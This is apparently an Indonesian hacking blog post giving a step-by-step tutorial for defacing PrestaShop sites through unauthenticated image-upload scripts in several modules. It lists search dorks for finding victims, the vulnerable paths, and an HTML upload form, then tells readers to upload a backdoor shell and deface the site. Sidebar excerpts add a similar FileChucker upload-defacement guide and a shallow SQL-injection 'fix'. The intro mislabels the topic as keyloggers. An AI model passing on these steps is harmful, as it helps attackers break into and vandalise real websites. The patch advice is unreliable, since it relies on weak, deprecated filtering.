Deface POC Prestashop File Upload

-

Deface Proof of Concept Prestashop File Upload
  

Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Dork : 
   Inurl:"/modules/columnadverts/"
   Inurl:"/modules/homepageadvertise/"
   Inurl:"/modules/productpageadverts/"
   Inurl:"/modules/simpleslideshow/"
   Inurl:"/modules/vtemslideshow/"
   Index Of "/modules/columnadverts/"
   Index Of "/modules/homepageadvertise/"
   Index Of "/modules/productpageadverts/"
   Index Of "/modules/simpleslideshow/"
   Index Of "/modules/vtemslideshow/"

Exploit
 http://loclahost/ modules/columnadverts/uploadimage.php
 http://localhost/ modules/homepageadvertise/uploadimage.php
 http://localhost/ modules/productpageadverts/uploadimage.php
 http://localhost/ modules/simpleslideshow/uploadimage.php
 http://localhost/ modules/vtemslideshow/uploadimage.php

CSRF : 
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>


Langsung Ke Tutorialnya.... :*

1. Cari Target Menggunakan Dork !

2. Pilih Salah Satu Situs Yang Ingin Di cRooTz   :v

3. Tambakan Exploit Setelah Url   :*
 http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !

4. Copy CSRF Yang Ada Di Atas Tadi   :*
Jangan Lupa Edit Dulu CSRF Tersebut .
 Localhost   >  Website Target .
 Modules Name   >   Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML   > All Files

5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu   :*
Jika Berhasil Akan Terlihat Seperti Ini


6. Dan Sekarang Lihat Letak Shell Nya
 http://localhost/modules/modules name/slides/Name_Shell.php

Kalau Sudah Ketemu Shellnya , Terserah Deh , Mau Deface Apanya Aja Bebas :*

Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian
Jangan Lupa Di Share ya :)


#Hacking
#AnarchoXploit 
#NusantaraCode

Komentar

Posting Komentar

Postingan populer dari blog ini

DEFACE UPLOAD FILE WITH FILECHUCKER

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi Bersama Saya RUTH72_ Kali Ini saya akan memberi Sedikit Turtorial  Ok Kita Langsung Ke Tutorial Nya aja ya hehe :V Dork -> inurl:/cgi-bin/filechucker.cgi          intext:Toptown File Upload  inurl:/cgi-bin/filechucker.pl Step by step : 1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step . 2 . isi data , asal asalan juga boleh gan :) 3 . nanti ada tempat pilih file -> upload sc kalian  4 . jika berhasil maka gambar seperti ini   5 . tingall buka deh hasilnya Http://target.com/upload/files/namafile.html Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian Jangan Lupa Di Share ya :) #Hacking #AnarchoXploit  #NusantaraCode
Baca selengkapnya

Cara Menutup Bug SQL Injection

-
Gambar
Assalamualaikum Warahmatullahi Wabarakatuh Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring Kali Ini saya akan Membahas Tentang Bagaimana  CARA MENUTUP BUG SQL INJECTION Kali ini saya akan menggunakan easy method untuk menutup bug tersebut. Memberi filter pada karakter yang akan dimasukkan ke dalam query. Kita halau karakter seperti (-) terlebih dahulu. if ( $id_anu < 0) { echo "Patched." ; exit ; } Definisi logika: Jika nilai $id kurang dari 0, maka akan tampil "Patched." | Mencegah karakter (-). Memberi perintah is_numeric.  if (!is_numeric( $id_anu )) { echo "Patched." ; exit ; } Definisi logika: Jika nilai $id bukan golongan dari numeric atau angka, maka akan tampil "Patched." Memberi fungsi mysql_real_escape_string. mysql_real_escape_string adalah fungsi PHP yang digunakan untuk memberi backslash di beberapa kode untuk ditampilkan pada halaman, namun saat menyimpan menuju sql, kode
Baca selengkapnya